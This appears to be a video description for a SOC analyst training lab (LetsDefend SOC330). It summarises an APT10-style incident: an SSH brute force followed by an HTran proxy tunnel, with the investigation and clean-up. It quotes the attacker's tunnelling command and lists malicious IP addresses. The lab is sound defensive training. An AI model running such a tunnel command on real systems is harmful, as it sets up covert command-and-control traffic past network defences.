APT10 MENUPASS — SSH Brute Force, HTran Proxy Tunnel to Malicious IP Confirmed | LetsDefend SOC330
Day 110 of Becoming a SOC Analyst — SOC330 HTran Network Tunneling APT10 MENUPASS (True Positive)
Attacker at 87.249.134.130 gained access to host Jenessa (172.16.17.131) via SSH brute force against the analyst account, then compiled and executed HTran on the endpoint to establish a proxy tunnel — ./HTran -slave 218.27.4.98 4444 18.189.13.47 80 — routing traffic out through known malicious infrastructure. No lateral movement or additional persistence was identified beyond the tunnel itself, but the HTran binary, compromised account, and sudo access were all cleaned up and the endpoint contained. APT10/MENUPASS TTPs confirmed: SSH brute force → proxy tool deployment → protocol tunneling for C2.
🔬 Analysis Reports
🦠 VirusTotal (HTran) → https://www.virustotal.com/gui/file/3...
🔍 AbuseIPDB (attacker) → https://www.abuseipdb.com/check/87.24...
🔍 AbuseIPDB (proxy endpoint) → https://www.abuseipdb.com/check/218.2...
📦 HTran Reference → https://github.com/HiwinCN/HTran
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 110 intro
00:26 Alert Details
01:30 Investigation
17:30 Playbook Answers
39:00 5w Log
42:00 Result
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #APT10 #MENUPASS #HTran #ProtocolTunneling #SSHBruteForce #IncidentResponse #SIEM #Day110 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity